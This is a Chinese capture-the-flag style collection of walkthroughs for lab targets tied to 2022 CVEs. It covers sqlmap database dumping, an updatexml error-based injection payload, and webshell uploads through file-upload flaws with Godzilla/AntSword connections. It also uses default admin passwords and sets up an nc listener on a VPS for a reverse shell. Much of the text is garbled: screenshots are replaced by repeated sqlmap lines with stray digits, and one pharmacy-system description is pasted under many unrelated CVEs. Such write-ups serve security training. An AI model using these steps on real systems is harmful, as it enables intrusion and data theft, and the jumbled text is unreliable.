CVE-2022-32991 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-32991
靶标介绍:
该CMS的welcome.php中存在SQL注入攻击。
开启靶场
首先注册用户
进入到主页发现就是 welcome.php
根据CVE官方:在 welcome.php,发现基于 Web 的测验系统 v1.0 通过 eid 参数包含一个 SQL 注入漏洞。观察该页面 URL,发现虽然为 welcome.php,但参数并不是 eid,继续查找其他页面,点击第一栏 Start 进行跳转,发现存在 welcome.php 和 eid 参数
Burpsuite 抓包
保存为 1.txt,发现存在注入
python sqlmap.py -r 1.txt --batch
暴库
python sqlmap.py -r 1.txt --batch --dbs
暴表
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
暴名
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
暴数据
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
CVE-2022-30887 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-30887
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
开启场景
发现是需要登录的,并且不能注册,滑到页面最下方,点击 Mayuri K
跳转页面之后最下方找到
Efficient Garments Management System Project In PHP And MySQL: Free Download
点击进去之后,等待几秒,自动弹出邮箱
[email protected]
密码就是:mayurik,其实也是此 cms 的默认账号密码,登录
发现在 Add Medicine 中可以进行文件上传
Add Medicine 页面上传木马
python sqlmap.py -r 1.txt --batch
0上传成功,发现已经存在
右键复制图像链接
python sqlmap.py -r 1.txt --batch
1访问发现 phpinfo 已经执行
利用木马进行命令执行
python sqlmap.py -r 1.txt --batch
2python sqlmap.py -r 1.txt --batch
3CVE-2022-29464 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-29464
python sqlmap.py -r 1.txt --batch
4打开环境是一个登录界面
题目也给我们提示了 WSO2文件上传漏洞(CVE-2022-29464),直接去GitHub搜一个exp直接运行就行
python sqlmap.py -r 1.txt --batch
5使用指令:
python sqlmap.py -r 1.txt --batch
6然后访问如下图路径即可
python sqlmap.py -r 1.txt --batch
7python sqlmap.py -r 1.txt --batch
8CVE-2022-28525 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-28525
python sqlmap.py -r 1.txt --batch
9打开环境后弱口令 admin:admin 登录
登录成功后寻找上传点,Users -> Add User
上传成功
复制图片链接
哥斯拉测试连接
找到 flag
CVE-2022-28512 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-28512
python sqlmap.py -r 1.txt --batch --dbs
0弱口令 admin:admin 进入后台
然后发现不在后台,在 index 页面的
发现 id 参数
bp 抓包保存流量包
sqlmap 一把梭,存在注入点
python sqlmap.py -r 1.txt --batch
python sqlmap.py -r 1.txt --batch --dbs
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
CVE-2022-28060 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-28060
python sqlmap.py -r 1.txt --batch --dbs
6找到 /includes/login.php
bp 抓包
sqlmap 找到注入点
python sqlmap.py -r 1.txt --batch
python sqlmap.py -r 1.txt --batch --dbs
8或者使用 Sqlmap 获取 flag,通过 –sql-shell 再传入 load_file 进行文件读取:
python sqlmap.py -r 1.txt --batch --dbs
9CVE-2022-26965 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-26965
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
0打开环境进入 admin 登录页面
弱口令 admin 登录
在主题中可利用文件上传
GitHub 寻找开源主题,阅读源码,发现安装主题会读取并执行主题中Info.php。修改 info.php 代码。
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
1更改后重新打包压缩包上传
救
因为写入木马中得文件名为 shell.php,直接访问,发现 phpinfo 执行
获取 flag
或者直接使用别人写好的 exp,有一点需要注意,默认的路径没有 /pluck
访问给出的 url
CVE-2022-26201 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-26201
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
2打开环境,首先注册一个账号
注册完登录
找到注入点
sqlmap 一把梭
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
3python sqlmap.py -r 1.txt --batch -D "ctf" --tables
4分类.php 界面同样存在注入漏洞
输入值,抓包保存
python sqlmap.py -r 1.txt --batch
python sqlmap.py -r 1.txt --batch --dbs
8CVE-2022-25578 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-25578
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
7打开环境
拼接 admin 进行后台登陆
利用默认口令 admin:tao 登录
第一种方法:.htaccess文件执行任意代码
在文件管理中找到 .htaccess 文件
编辑为
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
8在文章管理->添加文章中上传缩略图
接着在 picture 中找到
拼接路径到 url,phpinfo 成功执行
python sqlmap.py -r 1.txt --batch -D "ctf" --tables
9蚁剑连接
得到flag
第二种方法:已知路径,直接包含
任意选择一个 php 文件编写代码上传,我这里选择的是 config.php
编辑
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
0访问 config.php 回显出 phpinfo
蚁剑连接
CVE-2022-25488 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-25488
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
1打开场景,打开是空白的,据题目提示可以查看 /admin/ajax
访问 avatar.php 页面
加上 id=1
进行 sql 注入探测
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
2直接利用 load_file 进行 flag 读取
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
3CVE-2022-25411 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-25411
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
4开启环境
dirsearch 扫描到 robots.txt 文件,访问得到后台地址 admin
提示的有弱口令,bp爆破
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
5找到文件上传位置
在底部新增允许上传 php 文件
选择上传 php 的 shell
点击 url 弹出 php 图片地址
哥斯拉连接
CVE-2022-25401 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-25401
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
6打开环境,发现没有 administrator/,dirb 扫描
访问 templates/default/html/windows/ 发现 right.php 存在
在right.php的53行中存在
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
7kali 的 curl 请求访问根目录下的 flag 文件
curl 是一种命令行工具,作用是发出网络请求,然后得到和提取数据,显示在“标准输出” (stdout) 上面。它支持多种协议 查看网页源码 直接在 curl 命令后加上网址,就可以看到网页源码。
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
8CVE-2022-25099 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-25099
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" --columns
9打开环境,dirb 扫描
访问 admin 页面,弱口令 admin:123456 登录
附加组件 -> 种语言
上传
python sqlmap.py -r 1.txt --batch
0phpinfo 执行
未找到上传地址,那就直接上传命令执行
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
1CVE-2022-24663 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-24663
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
2打开环境,右下角发现:自豪地采用 WordPress
WordPress 默认登录页面为 wp-login.php,访问
提示存在常见用户名低权限用户弱口令,bp 爆破出为 test:test
登录
提示任何订阅者都可以利用该漏洞发送带有“短代码”参数设置为 PHP Everywhere 的请求,并在站点上执行任意 PHP 代码
这里指的是任意 PHP 代码并且是任意位置
随便找个 html 页面进行 exp 注入
插入
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
3php 解析
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
4点击执行,出现 success 则说明上传成功
访问 fuck.php,发现 phpinfo 成功执行
蚁剑连接
找到 flag
或者
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
5CVE-2022-24263 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-24263
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
6三个页面随便选一个
bp 抓包
python sqlmap.py -r 1.txt --batch
python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
8python sqlmap.py -r 1.txt --batch -D "ctf" -T "flag" -C "flag" --dump
9--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
0--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
1CVE-2022-24223 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-24223
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
2dirsearch 扫描到登录界面
访问
bp 抓包
python sqlmap.py -r 1.txt --batch
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
4--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
5--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
6--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
7CVE-2022-24124 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-24124
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
8概念验证
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数
9官方 poc
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
0报错注入查数据库版本:
查询数据库报错
可以通过注入 XPATH 函数来利用此漏洞。字段参数中的 UpdateXML() 或 ExtractValue() 以生成错误并获取查询输出。
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
1每当 XPATH 查询的语法不正确时,我们都会看到一条错误消息,转储 SQL 查询的输出:
XPATH 语法错误:
casdoor:错误 1105:仅支持常量 XPATH 查询
报错:casdoor:错误1105仅支持常量xpath查询
明明updatexml函数是可以利用XPATH函数查询的,比如,可以查版本:
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
2我们查库的时候就不可以了:
&field=updatexml(0,concat(0x7e,(database()),0x7e),0)
这时是因为输出的内容在响应包和页面中被限制了
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
3burp 爆破字符
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
4正确和错误回显是不同的,下图为正确的
CVE-2022-24112 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-24112
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
5poc 地址
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
6VPS开启监听:nc -lvvp 12345
进入POC目录运行:
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
7反弹成功得到 flag
CVE-2022-23906 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-23906
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
8dirsearch 扫描
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
9访问 /admin/login.php ,抓包爆破得到 admin:123456
找上传点
插入图片
复制图片
改后缀为 php
复制链接
哥斯拉连接
获取 flag
CVE-2022-23880 漏洞-<>-<>
主页→漏洞靶标→免费空间→CVE-2022-23880
Efficient Garments Management System Project In PHP And MySQL: Free Download
0拼接 admin 进行后台登陆
利用默认口令 admin:tao 登录
新建文件 CVE-2022-23880.php
编辑
Efficient Garments Management System Project In PHP And MySQL: Free Download
1复制链接,哥斯拉连接
找到 flag
长按二维码识别关注
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...